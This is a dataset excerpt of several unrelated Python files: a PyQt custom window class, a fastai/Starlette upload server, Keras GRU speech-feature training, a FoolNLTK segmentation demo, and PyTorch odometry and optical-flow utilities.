contentLayout.setContentsMargins(0, 0, 0, 0)\n contentLayout.addWidget(w)\n\n self.windowContent.setLayout(contentLayout)\n\n self.setWindowTitle(w.windowTitle())\n # w.windowTitleChanged.connect(lambda title: self.setWindowTitle(title))\n\n rect = w.geometry()\n rect.setHeight(rect.height() + self.titleBar.size().height())\n self.setGeometry(rect)\n\n # Adding attribute to clean up the parent window when the child is closed\n self._w.setAttribute(Qt.WA_DeleteOnClose, True)\n self._w.destroyed.connect(self.__child_was_closed)\n\n effect = QGraphicsDropShadowEffect()\n effect.setBlurRadius(5)\n self.setGraphicsEffect(effect)\n\n self.modal = modal\n if modal:\n # Modality doesn't usually work, this fixes it, kind of.\n # Kind of an overkill bc it stays over other windows too, but otherwise doesn't work.\n self.setWindowModality(Qt.ApplicationModal)\n self.setWindowFlag(Qt.WindowStaysOnTopHint)\n # ModernWindow.MODAL_WINDOWS.append(self)\n\n # if not ModernWindow.INST: # Trying to get normal modal behavior\n # def modalityHandler(x, y):\n # wins = [win for win in QApplication.topLevelWidgets() if isinstance(win, ModernWindow)]\n # if x is None and y is not None:\n # if y.window() in ModernWindow.MODAL_WINDOWS:\n # y.window().setWindowFlag(Qt.WindowStaysOnTopHint)\n # elif y is None and x is not None:\n # if x.window() in ModernWindow.MODAL_WINDOWS:\n # x.window().setWindowFlag(Qt.WindowStaysOnTopHint, False)\n # for win in wins:\n # win.show()\n #\n # QApplication.instance().focusChanged.connect(lambda x, y: modalityHandler(x, y))\n # ModernWindow.INST = True\n\n def setupUi(self):\n # create title bar, content\n self.vboxWindow = QVBoxLayout(self)\n self.vboxWindow.setObjectName('vboxWindow')\n self.vboxWindow.setContentsMargins(0, 0, 0, 0)\n\n self.windowFrame = QWidget(self)\n self.windowFrame.setObjectName('windowFrame')\n\n self.vboxFrame = QVBoxLayout(self.windowFrame)\n self.vboxFrame.setContentsMargins(0, 0, 0, 0)\n\n self.titleBar = WindowDragger(self, self.windowFrame)\n self.titleBar.setObjectName('titleBar')\n self.titleBar.setSizePolicy(QSizePolicy(QSizePolicy.Preferred,\n QSizePolicy.Fixed))\n\n self.hboxTitle = QHBoxLayout(self.titleBar)\n self.hboxTitle.setContentsMargins(0, 0, 0, 0)\n self.hboxTitle.setSpacing(0)\n\n self.lblTitle = QLabel('Title')\n self.lblTitle.setObjectName('lblTitle')\n self.lblTitle.setAlignment(Qt.AlignCenter)\n\n spButtons = QSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)\n\n self.btnMinimize = QToolButton(self.titleBar)\n self.btnMinimize.setObjectName('btnMinimize')\n self.btnMinimize.setSizePolicy(spButtons)\n\n self.btnRestore = QToolButton(self.titleBar)\n self.btnRestore.setObjectName('btnRestore')\n self.btnRestore.setSizePolicy(spButtons)\n\n self.btnMaximize = QToolButton(self.titleBar)\n self.btnMaximize.setObjectName('btnMaximize')\n self.btnMaximize.setSizePolicy(spButtons)\n\n self.btnClose = QToolButton(self.titleBar)\n self.btnClose.setObjectName('btnClose')\n self.btnClose.setSizePolicy(spButtons)\n\n self.vboxFrame.addWidget(self.titleBar)\n\n self.windowContent = QWidget(self.windowFrame)\n self.vboxFrame.addWidget(self.windowContent)\n\n self.vboxWindow.addWidget(self.windowFrame)\n\n if PLATFORM == \"Darwin\":\n self.hboxTitle.addWidget(self.btnClose)\n self.hboxTitle.addWidget(self.btnMinimize)\n self.hboxTitle.addWidget(self.btnRestore)\n self.hboxTitle.addWidget(self.btnMaximize)\n self.hboxTitle.addWidget(self.lblTitle)\n else:\n self.hboxTitle.addWidget(self.lblTitle)\n self.hboxTitle.addWidget(self.btnMinimize)\n self.hboxTitle.addWidget(self.btnRestore)\n self.hboxTitle.addWidget(self.btnMaximize)\n self.hboxTitle.addWidget(self.btnClose)\n\n # set window flags\n self.setWindowFlags(Qt.Dialog | Qt.FramelessWindowHint | Qt.WindowSystemMenuHint |\n Qt.WindowCloseButtonHint | Qt.WindowMinimizeButtonHint | Qt.WindowMaximizeButtonHint)\n\n self.setAttribute(Qt.WA_TranslucentBackground)\n\n # set stylesheet\n with open(_FL_STYLESHEET) as stylesheet:\n self.setStyleSheet(stylesheet.read())\n\n # automatically connect slots\n QMetaObject.connectSlotsByName(self)\n\n def __child_was_closed(self):\n self._w = None # The child was deleted, remove the reference to it and close the parent window\n self.close()\n\n def closeEvent(self, event):\n # if self.modal:\n # ModernWindow.MODAL_WINDOWS.remove(self)\n\n if not self._w:\n event.accept()\n else:\n self._w.close()\n event.setAccepted(self._w.isHidden())\n\n def setWindowTitle(self, title):\n \"\"\" Set window title.\n\n Args:\n title (str): Title.\n \"\"\"\n\n QDialog.setWindowTitle(self, \" \" + title)\n self.lblTitle.setText(\" \" + title)\n\n def _setWindowButtonState(self, hint, state):\n btns = {\n Qt.WindowCloseButtonHint: self.btnClose,\n Qt.WindowMinimizeButtonHint: self.btnMinimize,\n Qt.WindowMaximizeButtonHint: self.btnMaximize\n }\n button = btns.get(hint)\n\n maximized = bool(self.windowState() & Qt.WindowMaximized)\n\n if button == self.btnMaximize: # special rules for max/restore\n self.btnRestore.setEnabled(state)\n self.btnMaximize.setEnabled(state)\n\n if maximized:\n self.btnRestore.setVisible(state)\n self.btnMaximize.setVisible(False)\n else:\n self.btnMaximize.setVisible(state)\n self.btnRestore.setVisible(False)\n else:\n button.setEnabled(state)\n\n allButtons = [self.btnClose, self.btnMinimize, self.btnMaximize, self.btnRestore]\n if True in [b.isEnabled() for b in allButtons]:\n for b in allButtons:\n b.setVisible(True)\n if maximized:\n self.btnMaximize.setVisible(False)\n else:\n self.btnRestore.setVisible(False)\n self.lblTitle.setContentsMargins(0, 0, 0, 0)\n else:\n for b in allButtons:\n b.setVisible(False)\n self.lblTitle.setContentsMargins(0, 2, 0, 0)\n\n def setWindowFlag(self, Qt_WindowType, on=True):\n buttonHints = [Qt.WindowCloseButtonHint, Qt.WindowMinimizeButtonHint, Qt.WindowMaximizeButtonHint]\n\n if Qt_WindowType in buttonHints:\n self._setWindowButtonState(Qt_WindowType, on)\n else:\n QWidget.setWindowFlag(self, Qt_WindowType, on)\n\n def setWindowFlags(self, Qt_WindowFlags):\n buttonHints = [Qt.WindowCloseButtonHint, Qt.WindowMinimizeButtonHint, Qt.WindowMaximizeButtonHint]\n for hint in buttonHints:\n self._setWindowButtonState(hint, bool(Qt_WindowFlags & hint))\n\n QWidget.setWindowFlags(self, Qt_WindowFlags)\n\n @Slot()\n def on_btnMinimize_clicked(self):\n self.showMinimized()\n\n @Slot()\n def on_btnMaximize_clicked(self):\n if self.maximized:\n self.showNormal()\n else:\n self.showMaximized()\n\n @Slot()\n def on_btnClose_clicked(self):\n self.close()\n\n @Slot()\n def on_titleBar_doubleClicked(self):\n self.on_btnMaximize_clicked()\n\n def showMaximized(self):\n \"\"\"\n Overrides showMaximized to give normal functionality (not usually normal since this is a widget)\n \"\"\"\n self.usualSize = self.size()\n self.setWindowState(Qt.WindowMaximized)\n self.move(0, 0)\n self.setFixedSize(QSize(self.screenSize.width(), self.screenSize.height()))\n self.maximized = True\n QWidget.showMaximized(self)\n\n def showNormal(self):\n self.setWindowState(Qt.WindowNoState)\n self.setMinimumSize(100, 50)\n self.resize(self.usualSize)\n self.maximized = False\n QWidget.showNormal(self)\n\n def exec_(self) -> int:\n \"\"\"\n Overloads the original exec function to give expected behavior with custom title bar.\n Returns button clicked if dialog.\n :return: integer bit value of button clicked\n :rtype: int\n \"\"\"\n self._w.finished.connect(lambda state: self.done(state))\n return QDialog.exec_(self)\n\n def resizeEvent(self, event: 'QResizeEvent'):\n \"\"\"\n Catches when self is resized, and makes sure\n\n :param event: The resize event, storing the new size\n :type event: QResizeEvent\n \"\"\"\n newSize = event.size()\n # self.setMask(QRegion(self.rect()))\n\n if self._movedToCenter < 3: # 2 size adjustments are done before self reaches its final assigned size.\n self.move(self.screenSize.width() / 2 - newSize.width() / 2,\n self.screenSize.height() / 2 - newSize.height() / 2)\n self._movedToCenter += 1\n","sub_path":"qtmodern_facade/windows.py","file_name":"windows.py","file_ext":"py","file_size_in_byte":12471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"177325717","text":"import aiohttp\nimport asyncio\nimport uvicorn\nimport pandas as pd\nimport re\nimport numpy as np\nfrom fastai import *\nfrom fastai.vision import *\nfrom io import BytesIO\nfrom starlette.applications import Starlette\nfrom starlette.middleware.cors import CORSMiddleware\nfrom starlette.responses import HTMLResponse, JSONResponse\nfrom starlette.staticfiles import StaticFiles\n\nexport_file_url = 'https://www.dropbox.com/s/xw4kzxi0jrf1gou/dgwbh.pkl?dl=1'\nexport_file_name = 'dgwbh.pkl'\n\nclasses = ['lidl', 'spisestuerne', 'netto', 'seveneleven']\npath = Path(__file__).parent\n\napp = Starlette()\napp.add_middleware(CORSMiddleware, allow_origins=['*'], allow_headers=['X-Requested-With', 'Content-Type'])\napp.mount('/static', StaticFiles(directory='app/static'))\n\n\nasync def download_file(url, dest):\n if dest.exists(): return\n async with aiohttp.ClientSession() as session:\n async with session.get(url) as response:\n data = await response.read()\n with open(dest, 'wb') as f:\n f.write(data)\n\n\nasync def setup_learner():\n await download_file(export_file_url, path / export_file_name)\n try:\n learn = load_learner(path, export_file_name)\n return learn\n except RuntimeError as e:\n if len(e.args) > 0 and 'CPU-only machine' in e.args[0]:\n print(e)\n message = \"\\n\\nThis model was trained with an old version of fastai and will not work in a CPU environment.\\n\\nPlease update the fastai library in your training environment and export your model again.\\n\\nSee instructions for 'Returning to work' at https://course.fast.ai.\"\n raise RuntimeError(message)\n else:\n raise\n\n\nloop = asyncio.get_event_loop()\ntasks = [asyncio.ensure_future(setup_learner())]\nlearn = loop.run_until_complete(asyncio.gather(*tasks))[0]\nloop.close()\n\n\n@app.route('/')\nasync def homepage(request):\n html_file = path / 'view' / 'FileUpload.html'\n return HTMLResponse(html_file.open().read())\n\n\n@app.route('/upload', methods=['POST'])\nasync def upload_file(request):\n csv_data = await request.form()\n csv_bytes = await (csv_data['file'].read())\n \n x = str(csv_bytes)\n l = x.split('\\\\r\\\\')\n d = np.array(l)\n \n df = pd.DataFrame()\n df['Dato'] = df.apply(lambda _: '', axis=1)\n df['Tekst'] = df.apply(lambda _: '', axis=1)\n df['Beløb'] = df.apply(lambda _: '', axis=1)\n df['Saldo'] = df.apply(lambda _: '', axis=1)\n df['Status'] = df.apply(lambda _: '', axis=1)\n df['Afstemt'] = df.apply(lambda _: '', axis=1)\n \n date=[]\n text=[]\n amount=[]\n saldo=[]\n status=[]\n afstemt=[]\n \n \n\n\n for line in range(d.shape[0]):\n a = d[line].split('\\\\\";\\\\\"')\n date.append(a[0])\n text.append(a[1])\n amount.append(a[2])\n saldo.append(a[3])\n status.append(a[4])\n afstemt.append(a[5])\n \n #df['Dato']=date\n #df['Tekst']=text\n #df['Beløb']=amount\n #df['Saldo']=saldo\n #df['Status']=status\n #df['Afstemt']=afstemt\n \n #df['Dato'] = df['Dato'].replace({'\\n\\\"':''}, regex = True)\n #df['Dato'] = df['Dato'].replace({'\\\"':''}, regex = True)\n #df['Tekst'] = df['Tekst'].replace({'\\\"':''}, regex = True)\n #df['Beløb'] = df['Beløb'].replace({'\\\"':''}, regex = True)\n #df['Beløb'] = df['Beløb'].replace({'\\.':''}, regex = True)\n #df['Beløb'] = df['Beløb'].replace({'\\,':'.'}, regex = True)\n \n # df1 = df[['Dato','Tekst','Beløb']][1:]\n \n #df1['Prediction'] = df1.apply(lambda _: '', axis=1)\n\n #for i in range(df1.shape[0]):\n # df1['Prediction'][i] = learn.predict(df1['Tekst'][i])\n\n #df1['Prediction'] = df1['Prediction'].astype(str)\n\n #def clean_predictions(programme): \n # Search for comma in the name followed by any characters repeated any number of times \n # if re.search('\\,.*', programme): \n \n # Extract the position of beginning of pattern \n # pos = re.search('\\,.*', programme).start() \n # pos1 = (programme).find(' ')\n \n # return the cleaned name \n # return programme[pos1+1:pos] \n \n #else: \n #if none of those patterns found, return the original name\n # return programme \n \n# Updated the study programme columns \n # df1['Prediction'] = df1['Prediction'].apply(clean_predictions)\n \n #csv = (BytesIO(csv_bytes))\n \n #print(str(filename))\n #JSONResponse({'result': str(filename)})\n #prediction = learn.predict('lidl')\n #return JSONResponse({'result': str(prediction)})\n#async def analyze(request):\n # prediction = learn.predict('lidl')\n # return JSONResponse({'result': str(prediction)})\n #img_data = await request.form()\n #img_bytes = await (img_data['file'].read())\n #img = open_image(BytesIO(img_bytes))\n #prediction = learn.predict(img)[0]\n #return JSONResponse({'result': str(prediction)})\n\n\nif __name__ == '__main__':\n if 'serve' in sys.argv:\n uvicorn.run(app=app, host='0.0.0.0', port=5000, log_level=\"info\")\n","sub_path":"app/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"62051778","text":"# -*- coding: utf-8 -*-\n\nimport sys\nimport numpy as np\nimport pickle as pkl\nimport os\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation\nfrom keras.layers import Conv1D, Conv2D, Reshape, Flatten, Bidirectional, TimeDistributed, GRU\nfrom keras.optimizers import SGD, Adam\nfrom keras.utils import np_utils\nfrom keras.models import load_model,model_from_json\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\n#os.environ[\"THEANO_FLAGS\"] = \"device=gpu0\"\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '1'\nimport json\n\ndata_path = \"feature/mfcc\"\nmodel_name = [\"best_1\",\"best_2\",\"best_3\"]\ndim_dict = {\"mfcc\" : 39, \"fbank\" : 69}\n\n# parameter\nnb_epoch = 500\nnb_batch = 20\nsplit_ratio = 0.33\n\nXtrain_raw = pkl.load(open(\"%s/Xtrain.pkl\" % data_path,'rb'))\nYtrain_raw = pkl.load(open(\"%s/Ytrain.pkl\" % data_path,'rb'))\n\n\nprint(\"Files loaded\")\n\ndef split_data(X,Y,split_ratio):\n\tindices = np.arange(X.shape[0]) \n\tnp.random.shuffle(indices) \n\n\tX_data = X[indices]\n\tY_data = Y[indices]\n\n\tnum_validation_sample = int(split_ratio * X_data.shape[0] )\n\n\tX_train = X_data[num_validation_sample:]\n\tY_train = Y_data[num_validation_sample:]\n\n\tX_val = X_data[:num_validation_sample]\n\tY_val = Y_data[:num_validation_sample]\n\n\treturn (X_train,Y_train),(X_val,Y_val)\n\ndef check_min_lebal(Y):\n\ta = Y.reshape(Y.shape[0]*Y.shape[1],Y.shape[2])\n\ts = np.sum(a,axis = 0)\n\tans = s.min()\n\tprint(ans)\n\treturn ans > 2100\n\n### split_data\n(Xtrain,Ytrain),(Xval,Yval) = split_data(Xtrain_raw,Ytrain_raw,split_ratio)\n\nwhile not (check_min_lebal(Ytrain)):\n\t(Xtrain,Ytrain),(Xval,Yval) = split_data(Xtrain_raw,Ytrain_raw,split_ratio)\n\ndef get_model(name):\n\n\tif name == model_name[0]:\n\t\tmodel = Sequential()\n\t\tprint('Building model.')\n\t\tmodel.add(Bidirectional(GRU(500,dropout = 0.3,activation='relu', return_sequences=True),batch_input_shape = (None,Xtrain.shape[1],Xtrain.shape[2])))\n\t\tmodel.add(Bidirectional(GRU(500,dropout = 0.3,activation='relu', return_sequences=True)))\n\t\tmodel.add(Bidirectional(GRU(250,dropout = 0.3,activation='relu', return_sequences=True)))\n\t\tmodel.add(Bidirectional(GRU(250,dropout = 0.3,activation='relu', return_sequences=True)))\n\t\tmodel.add(TimeDistributed(Dense(39,activation='softmax')))\n\n\telif name == model_name[1]:\n\t\tmodel = Sequential()\n\t\tprint('Building model.')\n\t\tmodel.add(Bidirectional(GRU(500,dropout = 0.25,activation='relu', return_sequences=True),batch_input_shape = (None,Xtrain.shape[1],Xtrain.shape[2])))\n\t\tmodel.add(Bidirectional(GRU(500,dropout = 0.25,activation='relu', return_sequences=True)))\n\t\tmodel.add(TimeDistributed(Dense(1000,activation='relu')))\n\t\tmodel.add(Dropout(0.5))\n\t\tmodel.add(TimeDistributed(Dense(1000,activation='relu')))\n\t\tmodel.add(Dropout(0.5))\n\t\tmodel.add(TimeDistributed(Dense(39,activation='softmax')))\n\n\telif name == model_name[2]:\n\t\tmodel = Sequential()\n\t\tprint('Building model.')\n\t\tmodel.add(Bidirectional(GRU(500,activation='relu', return_sequences=True),batch_input_shape = (None,Xtrain.shape[1],Xtrain.shape[2])))\n\t\tmodel.add(Bidirectional(GRU(500,activation='relu', return_sequences=True)))\n\t\tmodel.add(Bidirectional(GRU(500,activation='relu', return_sequences=True)))\n\t\tmodel.add(Bidirectional(GRU(500,activation='relu', return_sequences=True)))\n\t\tmodel.add(TimeDistributed(Dense(1000,activation='relu')))\n\t\tmodel.add(Dropout(0.25))\n\t\tmodel.add(TimeDistributed(Dense(39,activation='softmax')))\n\n\tadam = Adam(lr=0.001,decay=1e-6,clipvalue=0.5)\n\tmodel.compile(loss='categorical_crossentropy',\n\t optimizer='adam',\n\t metrics=['accuracy'])\n\twith open(\"model/%s.json\" % name, 'w') as f:\n\t\tjson.dump(model.to_json(), f)\n\n\tmodel.summary()\n\tearlystopping = EarlyStopping(monitor='val_loss', patience = 7, verbose=1, mode='min')\n\tcheckpoint = ModelCheckpoint(filepath=\"model/%s_model_weight.hdf5\" % name,\n\t verbose=1,\n\t save_best_only=True,\n\t save_weights_only=True,\n\t monitor='val_loss',\n\t mode='min')\n\treturn model,earlystopping,checkpoint,name\n\ndef fit(model,earlystopping,checkpoint,name):\n\thist = model.fit(Xtrain, Ytrain, \n validation_data=(Xval, Yval),\n epochs=nb_epoch, \n batch_size=nb_batch,\n callbacks=[earlystopping,checkpoint])\n\n\tif not (os.path.exists(\"history/\")):\n\t\tos.makedirs(\"history/\")\n\tpkl.dump(hist, open(\"history/%s.pkl\" % name,'wb'), pkl.HIGHEST_PROTOCOL)\n\n\tmodel.load_weights(\"model/%s_model_weight.hdf5\" % name)\n\n\tscore = model.evaluate(Xval, Yval)\n\n\t#print(score)\n\treturn score\n\nfor i in range(0,3):\n\tmodel,earlystopping,checkpoint,name = get_model(model_name[i])\n\tprint( fit(model,earlystopping,checkpoint,name) )\n","sub_path":"hw1/model_best.py","file_name":"model_best.py","file_ext":"py","file_size_in_byte":4746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"123826617","text":"import fool\n#fool里有初始定义文件:init.py: [\"load_model\", \"cut\", \"pos_cut\", \"ner\", \"analysis\", \"load_userdict\", \"delete_userdict\"]\n#load_model(): 加载分词训练模型\n\n\ntext = \"一个傻子在北京\"\nprint(fool.cut(text))\n\n\n\n\n#用户可自定义辞典,词的权重越高,词的长度越长就越越可能出现, 权重值请大于1\nfool.load_userdict('/Users/jiweilu/Desktop/1.txt')\ntext = [\"我在北京天安门看你难受香菇\", \"我在北京晒太阳你在非洲看雪\"]\n\nprint(fool.cut(text))\n\nfool.load_userdict('/Users/jiweilu/Desktop/1.txt')\ntext = [\"我在北京天安门看你难受香菇\", \"我在北京晒太阳你在非洲看雪\"]\nprint(fool.cut(text))\n\nfool.load_userdict('/Users/jiweilu/Desktop/2.txt')\ntext = [\"我在北京天安门看你难受香菇\", \"我在北京晒太阳你在非洲看雪\"]\n#[['我', '在', '北京天安门', '看', '你', '难受', '香菇'],\n# ['我', '在', '北京', '晒太阳', '你', '在', '非洲', '看', '雪']]\nprint(fool.cut(text))\n\n\ntext = [\"一个傻子在北京\"]\nprint(fool.pos_cut(text))\n\n\ntext = [\"一个傻子在北京\",\"你好啊\"]\nwords,ners = fool.analysis(text)\nprint(ners)\n\nners = fool.ner(text)\nprint(\"ners:\", ners)\n\nwords=fool.cut(text, ignore=True)\nwords[:6]\nprint(words)\n\n\n\n#[[(5, 8, 'location', '北京')]]\n\n#5 8 表示北京在字符串5-8位置之间,即6和7,见lexial.py的ner函数定义\n\n\n#删除自定义字典;\nfool.delete_userdict();\n","sub_path":"jiweilu1119/FoolNltk/FoolNltk.py","file_name":"FoolNltk.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"44122479","text":"# -*- coding: utf-8 -*-\r\n\r\nimport torch\r\nimport shutil\r\nimport os\r\nimport math\r\nimport numpy as np\r\nfrom torch.autograd import Variable\r\nimport matplotlib\r\nmatplotlib.use('Agg')\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import style\r\nfrom numpy import mat\r\nfrom tqdm import tqdm\r\nimport torch.nn.functional as F\r\n\r\ndef folder_train(model_dir, log_dir, args):\r\n model_nets = model_dir + '/' + args.net_name\r\n log_nets = log_dir + '/' + args.net_name\r\n model_nets_time = model_nets + '/' + args.net_time\r\n log_nets_time = log_nets + '/' + args.net_time\r\n if not os.path.exists(model_dir):\r\n os.mkdir(model_dir)\r\n if not os.path.exists(log_dir):\r\n os.mkdir(log_dir)\r\n if not os.path.exists(model_nets):\r\n os.mkdir(model_nets)\r\n if not os.path.exists(log_nets):\r\n os.mkdir(log_nets)\r\n if not os.path.exists(model_nets_time):\r\n os.mkdir(model_nets_time)\r\n if os.path.exists(log_nets_time):\r\n shutil.rmtree(log_nets_time)\r\n os.mkdir(log_nets_time)\r\n return model_nets_time, log_nets_time\r\n\r\ndef folder_test(test_dir,args):\r\n net_dir = test_dir + '/' + args.net_restore\r\n net_time_dir = net_dir + '/' + args.dir_restore + '-' + args.model_restore\r\n if not os.path.exists(test_dir):\r\n os.mkdir(test_dir)\r\n if not os.path.exists(net_dir):\r\n os.mkdir(net_dir)\r\n if not os.path.exists(net_time_dir):\r\n os.mkdir(net_time_dir)\r\n return net_time_dir\r\n\r\ndef to_var(x):\r\n if torch.cuda.is_available():\r\n return Variable(x).cuda()\r\n else:\r\n return Variable(x)\r\n\r\ndef adjust_learning_rate(optimizer, epoch, lr_base, gamma=0.316, epoch_lr_decay=25):\r\n exp = int(math.floor(epoch / epoch_lr_decay))\r\n lr_decay = gamma ** exp\r\n for param_group in optimizer.param_groups:\r\n param_group['lr'] = lr_decay * lr_base\r\n\r\ndef display_t(hour_per_epoch, epoch, args, step, step_per_epoch, optimizer, loss, loss1, loss2,\r\n loss_list, loss1_list, loss2_list, writer, step_global):\r\n print('time:{:.3f} epoch:[{:03d}/{:03d}] step:[{:03d}/{:03d}] lr:{:.7f} loss:{:.4f}({:.4f})={:.4f}({:.4f})+{:d}*{:.4f}({:.4f})'.format(hour_per_epoch, epoch + 1, args.epoch_max, step + 1,\r\n step_per_epoch,optimizer.param_groups[0]['lr'],loss,np.mean(loss_list), loss1,np.mean(loss1_list), args.beta, loss2, np.mean(loss2_list)))\r\n writer.add_scalars('./train-val', {'loss_t': loss, 'loss1_t': loss1, 'loss2_t': loss2}, step_global)\r\n\r\ndef display_v(batch_v, loss_v, loss1_v, loss2_v, args, writer, step_global):\r\n print('{:d}batches loss:{:.4f}={:.4f}+{:d}*{:.4f}'.format(batch_v, loss_v, loss1_v, args.beta, loss2_v))\r\n writer.add_scalars('./train-val', {'loss_v': loss_v, 'loss1_v': loss1_v, 'loss2_v': loss2_v}, step_global)\r\n\r\ndef eulerAnglesToRotationMatrix(theta):\r\n # 欧拉角转换为旋转矩阵\r\n R_x = np.array([[1, 0, 0],\r\n [0, math.cos(theta[0]), -math.sin(theta[0])],\r\n [0, math.sin(theta[0]), math.cos(theta[0])]\r\n ])\r\n\r\n R_y = np.array([[math.cos(theta[1]), 0, math.sin(theta[1])],\r\n [0, 1, 0],\r\n [-math.sin(theta[1]), 0, math.cos(theta[1])]\r\n ])\r\n\r\n R_z = np.array([[math.cos(theta[2]), -math.sin(theta[2]), 0],\r\n [math.sin(theta[2]), math.cos(theta[2]), 0],\r\n [0, 0, 1]\r\n ])\r\n\r\n R = np.dot(R_z, np.dot(R_y, R_x))\r\n\r\n return R\r\n\r\ndef relative2absolute(rel):\r\n rel = np.array(rel) #6-d\r\n abl = [] # 12-d\r\n t1 = mat(np.eye(4))\r\n abl.extend([np.array(t1[0: 3, :]).reshape([-1])])\r\n for i in tqdm(range(len(rel))):\r\n x12 = rel[i, 0]\r\n y12 = rel[i, 1]\r\n z12 = rel[i, 2]\r\n theta = np.array([rel[i, 3] / 180 * math.pi,rel[i, 4] / 180 * math.pi,rel[i, 5] / 180 * math.pi])\r\n Rot = eulerAnglesToRotationMatrix(theta)\r\n t12 = np.row_stack((np.column_stack((Rot, [[x12], [y12], [z12]])), [0, 0, 0, 1]))\r\n t2 = t1 * t12\r\n abl.extend([np.array(t2[0: 3, :]).reshape([-1])])\r\n t1 = t2\r\n return np.array(abl)\r\n\r\ndef plot_pose(seq,label_dir, save_dir, pose_abl, epoch=None, args=None):\r\n plt.close('all')\r\n style.use(\"ggplot\")\r\n pose_gt = np.loadtxt(label_dir+'-12d/{:02d}.txt'.format(seq))\r\n pose_pre = np.array(pose_abl)\r\n plt.plot(pose_gt[:, 3], pose_gt[:, 11], '--', c='k', label='Ground Truth')\r\n if args.phase == 'Train':\r\n plt.plot(pose_pre[:, 3], pose_pre[:, 11], '-', c='b', label='model-{:d}'.format(epoch))\r\n else:\r\n plt.plot(pose_pre[:, 3], pose_pre[:, 11], '-', c='r', label=args.model_restore)\r\n plt.title('Sequence {:02d}'.format(seq))\r\n plt.xlabel('x[m]',fontsize=12)\r\n plt.ylabel('z[m]',fontsize=12)\r\n plt.axis('equal')\r\n plt.legend(fontsize=12)\r\n if args.phase == 'Train':\r\n plt.savefig(save_dir+'/{:02d}-epoch-{:d}.png'.format(seq, epoch))\r\n else:\r\n plt.savefig(save_dir + '/{:02d}.png'.format(seq))\r\n\r\ndef EPE(input_flow, target_flow, sparse=False, mean=True):\r\n EPE_map = torch.norm(target_flow-input_flow,2,1)\r\n batch_size = EPE_map.size(0)\r\n if sparse:\r\n mask = (target_flow[:,0] == 0) & (target_flow[:,1] == 0)\r\n EPE_map = EPE_map[~mask]\r\n if mean:\r\n return EPE_map.mean()\r\n else:\r\n return EPE_map.sum()/batch_size\r\n\r\ndef sparse_max_pool(input, size):\r\n positive = (input > 0).float()\r\n negative = (input < 0).float()\r\n output = F.adaptive_max_pool2d(input * positive, size) - F.adaptive_max_pool2d(-input * negative, size)\r\n return output\r\n\r\ndef multiscaleEPE(network_output, target_flow, weights=None, sparse=False):\r\n def one_scale(output, target, sparse):\r\n b, _, h, w = output.size()\r\n if sparse:\r\n target_scaled = sparse_max_pool(target, (h, w))\r\n else:\r\n target_scaled = F.interpolate(target, (h, w), mode='area')\r\n return EPE(output, target_scaled, sparse, mean=False)\r\n if type(network_output) not in [tuple, list]:\r\n network_output = [network_output]\r\n if weights is None:\r\n weights = [0.005, 0.01, 0.02, 0.08, 0.32] # as in original article\r\n assert(len(weights) == len(network_output))\r\n loss = 0\r\n for output, weight in zip(network_output, weights):\r\n loss += weight * one_scale(output, target_flow, sparse)\r\n return loss\r\n\r\ndef realEPE(output, target, sparse=False):\r\n b, _, h, w = target.size()\r\n upsampled_output = F.interpolate(output, (h,w), mode='bilinear', align_corners=False)\r\n return EPE(upsampled_output, target, sparse, mean=True)\r\n\r\ndef make_color_wheel():\r\n \"\"\"\r\n Generate color wheel according Middlebury color code\r\n :return: Color wheel\r\n \"\"\"\r\n RY = 15\r\n YG = 6\r\n GC = 4\r\n CB = 11\r\n BM = 13\r\n MR = 6\r\n\r\n ncols = RY + YG + GC + CB + BM + MR\r\n\r\n colorwheel = np.zeros([ncols, 3])\r\n\r\n col = 0\r\n\r\n # RY\r\n colorwheel[0:RY, 0] = 255\r\n colorwheel[0:RY, 1] = np.transpose(np.floor(255*np.arange(0, RY) / RY))\r\n col += RY\r\n\r\n # YG\r\n colorwheel[col:col+YG, 0] = 255 - np.transpose(np.floor(255*np.arange(0, YG) / YG))\r\n colorwheel[col:col+YG, 1] = 255\r\n col += YG\r\n\r\n # GC\r\n colorwheel[col:col+GC, 1] = 255\r\n colorwheel[col:col+GC, 2] = np.transpose(np.floor(255*np.arange(0, GC) / GC))\r\n col += GC\r\n\r\n # CB\r\n colorwheel[col:col+CB, 1] = 255 - np.transpose(np.floor(255*np.arange(0, CB) / CB))\r\n colorwheel[col:col+CB, 2] = 255\r\n col += CB\r\n\r\n # BM\r\n colorwheel[col:col+BM, 2] = 255\r\n colorwheel[col:col+BM, 0] = np.transpose(np.floor(255*np.arange(0, BM) / BM))\r\n col += + BM\r\n\r\n # MR\r\n colorwheel[col:col+MR, 2] = 255 - np.transpose(np.floor(255 * np.arange(0, MR) / MR))\r\n colorwheel[col:col+MR, 0] = 255\r\n\r\n return colorwheel\r\n\r\ndef compute_color(u, v):\r\n \"\"\"\r\n compute optical flow color map\r\n :param u: optical flow horizontal map\r\n :param v: optical flow vertical map\r\n :return: optical flow in color code\r\n \"\"\"\r\n [h, w] = u.shape\r\n img = np.zeros([h, w, 3])\r\n nanIdx = np.isnan(u) | np.isnan(v)\r\n u[nanIdx] = 0\r\n v[nanIdx] = 0\r\n\r\n colorwheel = make_color_wheel()\r\n ncols = np.size(colorwheel, 0)\r\n\r\n rad = np.sqrt(u**2+v**2)\r\n\r\n a = np.arctan2(-v, -u) / np.pi\r\n\r\n fk = (a+1) / 2 * (ncols - 1) + 1\r\n\r\n k0 = np.floor(fk).astype(int)\r\n\r\n k1 = k0 + 1\r\n k1[k1 == ncols+1] = 1\r\n f = fk - k0\r\n\r\n for i in range(0, np.size(colorwheel,1)):\r\n tmp = colorwheel[:, i]\r\n col0 = tmp[k0-1] / 255\r\n col1 = tmp[k1-1] / 255\r\n col = (1-f) * col0 + f * col1\r\n\r\n idx = rad <= 1\r\n col[idx] = 1-rad[idx]*(1-col[idx])\r\n notidx = np.logical_not(idx)\r\n\r\n col[notidx] *= 0.75\r\n 